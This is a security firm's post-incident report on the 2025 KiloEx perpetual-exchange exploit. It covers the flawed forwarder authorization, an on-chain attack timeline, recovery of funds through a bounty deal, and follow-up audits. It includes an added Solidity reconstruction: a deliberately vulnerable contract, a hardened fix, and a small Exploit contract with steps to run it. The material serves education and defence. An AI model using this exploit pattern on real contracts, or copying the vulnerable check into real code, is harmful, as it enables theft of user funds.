On April 15, 2025, the decentralized perpetual contract trading platform KiloEx was attacked, losing approximately $8.44 million. SlowMist stepped in immediately after the incident to analyze it and issued a security alert. Thanks to the project team's prompt response and its collaboration with SlowMist and other parties, all stolen assets were recovered within 3.5 days and the incident was brought to a satisfactory close.

(https://x.com/SlowMist_Team/status/1911991384254402737)

Incident Review

Vulnerability Cause Analysis

According to KiloEx's post-mortem, the attack stemmed from a flaw in the contract's authorization checks. The TrustedForwarder contract inherited OpenZeppelin's MinimalForwarderUpgradeable, and because TrustedForwarder did not override the inherited execute method, execute remained callable by anyone with no additional authorization.

The attacker exploited this by calling the inherited MinimalForwarderUpgradeable execute method directly, with a forward request whose payload invoked delegateExecutePositions. That function only checked msg.sender == trustedForwarder; it never verified that the original initiator of the request was the keeper, so any caller routing through the forwarder passed the check. Using this, the attacker opened a position at an extremely low price in one transaction and then closed it at a much higher price, profiting from the artificial spread.
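The pattern described above, reconstructed as an added example (this is illustrative code, not KiloEx's or OpenZeppelin's source): a forwarder whose execute is callable by anyone relays a request to a position manager whose only check is msg.sender == trustedForwarder, shown beside a hardened version that recovers the ERC-2771 initiator from the appended calldata and requires it to be a keeper. The contract names, the isKeeper registry, the uint256 price parameter and the signature-less ToyForwarder are assumptions for illustration. OpenZeppelin's MinimalForwarder does verify an EIP-712 signature over the request, but that only proves the request came from req.from, an address the attacker can control, so it does not restrict who may route calls through the forwarder.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative reconstruction of the authorization pattern described above.
// Added example code, not KiloEx's or OpenZeppelin's source; contract names,
// the keeper registry and the price parameter are assumed.

// Toy ERC-2771-style forwarder. Anyone can call execute(); it relays `data`
// to `target` and appends the caller-supplied `from` as the last 20 bytes of
// calldata, which is how ERC-2771 targets learn the original initiator.
// OpenZeppelin's MinimalForwarder also checks an EIP-712 signature from
// `from`, but an attacker can sign for an address they control, so the
// signature check alone does not restrict who may use the forwarder.
contract ToyForwarder {
    function execute(address target, address from, bytes calldata data)
        external
        returns (bytes memory ret)
    {
        bool ok;
        (ok, ret) = target.call(abi.encodePacked(data, from));
        require(ok, "forwarded call failed");
    }
}

// Shared state: the forwarder address, a keeper allowlist and the last price a
// keeper fed in (in a perp DEX this price decides where a position opens/closes).
abstract contract PositionsBase {
    address public immutable trustedForwarder;
    mapping(address => bool) public isKeeper;
    uint256 public lastPrice;

    constructor(address forwarder, address keeper) {
        trustedForwarder = forwarder;
        isKeeper[keeper] = true;
    }

    // ERC-2771 sender recovery: when the call arrives via the trusted forwarder,
    // the original initiator is the address appended to calldata.
    function _msgSender() internal view returns (address sender) {
        if (msg.sender == trustedForwarder && msg.data.length >= 20) {
            assembly {
                sender := shr(96, calldataload(sub(calldatasize(), 20)))
            }
        } else {
            sender = msg.sender;
        }
    }
}

// VULNERABLE: proves only that the call came THROUGH the forwarder, never WHO
// initiated it. Any address can relay a delegateExecutePositions(price)
// request and set an arbitrary execution price.
contract VulnerablePositions is PositionsBase {
    constructor(address forwarder, address keeper) PositionsBase(forwarder, keeper) {}

    function delegateExecutePositions(uint256 price) external {
        require(msg.sender == trustedForwarder, "not forwarder");
        lastPrice = price;
    }
}

// HARDENED: additionally requires the recovered initiator to be a keeper.
contract HardenedPositions is PositionsBase {
    constructor(address forwarder, address keeper) PositionsBase(forwarder, keeper) {}

    function delegateExecutePositions(uint256 price) external {
        require(msg.sender == trustedForwarder, "not forwarder");
        require(isKeeper[_msgSender()], "initiator is not keeper");
        lastPrice = price;
    }
}

// Attacker-side sketch (constructed for this example): routes a price update
// through the forwarder from an address it controls. It succeeds against
// VulnerablePositions and reverts with "initiator is not keeper" against
// HardenedPositions.
contract Exploit {
    function run(ToyForwarder fwd, address target, uint256 price) external {
        bytes memory data =
            abi.encodeWithSignature("delegateExecutePositions(uint256)", price);
        fwd.execute(target, address(this), data);
    }
}
```

To try it, deploy ToyForwarder, then each Positions contract with the forwarder's address and a keeper address, and call Exploit.run against both targets with an absurd price: lastPrice changes on VulnerablePositions and the call reverts on HardenedPositions. The fix is not the forwarder itself but the target: a contract that accepts meta-transactions must authorize the recovered initiator (_msgSender()), not merely the relaying contract (msg.sender).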

Attack Timeline

The on-chain traces of this attack are clear; the key timestamps are as follows:

  • Apr-13-2025 23:31:59 UTC

    The hacker address 0x00faC92881556A90FdB19eAe9F23640B95B4bcBd withdrew 1 ETH from Tornado Cash as seed funds.

(https://etherscan.io/tx/0xa0fa4ab8ded0c07085d244e1981919b440f78b609e1cf8d7f8ee32d358dfdf46)

  • Apr-13-2025 23:39:11 ~ Apr-14-2025 01:21:36 UTC

    The hacker used multiple DeFi protocols and bridges to split the ETH withdrawn from Tornado Cash and move it to the opBNB, Base, BSC, Taiko, B2, and Manta chains, to pay gas for the subsequent deployment of the attack contracts.

(https://dashboard.misttrack.io/address/ETH/0x00faC92881556A90FdB19eAe9F23640B95B4bcBd)

  • Apr-14-2025 18:27:43 ~ 19:36:49 UTC

    The hacker deployed attack contracts on opBNB, Base, BSC, Taiko, B2, and Manta chains.

(https://opbnbscan.com/tx/0x657ab20a838043e36ab372a122804e07dbeca522b989899e27dee54b4c3f2971)

  • Apr-14-2025 18:52:27 ~ 19:40:49 UTC

    The hacker launched the attacks by calling the attack contracts on the opBNB, Base, BSC, Taiko, B2, and Manta chains.

(https://opbnbscan.com/tx/0x79eb28ae21698733048e2dae9f9fe3d913396dc9d93a0e30d659df6065127964)

Emergency Response

After the incident, under its emergency response service SlowMist immediately assembled an emergency security team that worked with KiloEx to map the attack path and the flow of funds, using its in-house on-chain anti-money-laundering tracking and analysis platform MistTrack (https://misttrack.io/) and the InMist threat intelligence network to extract information on the attacker and the attacker's characteristics.

At the same time, SlowMist played a key role in helping KiloEx conduct a comprehensive on-chain review of the incident, clarify the root cause of the vulnerability, and carry out multiple rounds of negotiation with the attacker to bring about a fund return plan.

(https://etherscan.io/idm?addresses=0x00fac92881556a90fdb19eae9f23640b95b4bcbd%2C0x1D568fc08a1d3978985bc3e896A22abD1222ABcF%2C&type=1)

With the collaboration of SlowMist and other parties, KiloEx ultimately reached a 10% white-hat bounty agreement with the hacker. The hacker then returned all stolen assets to KiloEx's official Safe multi-signature wallets at the following addresses:

  • opBNB: 0xb1a95732ed3c75f7b1dc594a357f7a957e9baad2

  • BNB, Base, ETH, Arbitrum: 0xd38a22f5330f45162f13086d6ccbde0335c1ae9e

  • Manta: 0x0f9c71f888c1d263eab34d6d9360a3a45855365d

The returned funds included not only the original USDT and USDC but also ETH, BNB, WBTC, and DAI that the hacker had swapped into during the attack.

(https://t[.]me/misttrack_alert)

The KiloEx team publicly thanked SlowMist for its assistance in this incident.

(https://x.com/KiloEx_perp/status/1913168299292328115)

Binance founder CZ also promptly reposted the related posts, saying: 'I am glad to see the industry and the @BNBChain ecosystem collaborating closely.'

(https://x.com/cz_binance/status/1913234751319859231)

Security Reinforcement

After the incident, KiloEx also engaged SlowMist for a security audit. SlowMist proposed two audit plans. The first was a comprehensive security audit of about 45 days, completed before the platform came back online, to ensure every component is secure. The second was to prioritize a thorough review of protocol permissions to prevent similar attacks, with KiloEx scheduling its relaunch based on the preliminary results of that permissions audit; once the permission issues were fixed, SlowMist would conduct an in-depth audit of KiloEx's overall logic and economic model, expected to take less than 45 days. Taking community feedback and launch timing into account, KiloEx ultimately chose the second plan: permissions audit first, then comprehensive audit.

(https://x.com/KiloEx_perp/status/1913542713825480863)

Summary

From the rapid response to the incident, through the full recovery of funds, to the follow-up audits and protective upgrades, the joint emergency response of KiloEx and SlowMist demonstrates the value of collaboration between security teams and project teams. It also reminds every Web3 project that security does not stop at a pre-launch audit: monitoring during an incident and post-incident emergency response matter just as much.

Security is never merely a patch applied after launch; it is a core concern across the entire life cycle of a Web3 project. SlowMist will continue to work with more projects to build a closed security loop of preemptive protection, real-time monitoring, and post-incident emergency response, safeguarding user assets and promoting the healthy development of the industry.

Finally, for a more detailed analysis of the KiloEx incident, see KiloEx's official root-cause report: https://medium.com/@KiloEx/kiloex-security-incident-root-cause-analysis-post-mortem-3d899caac08c.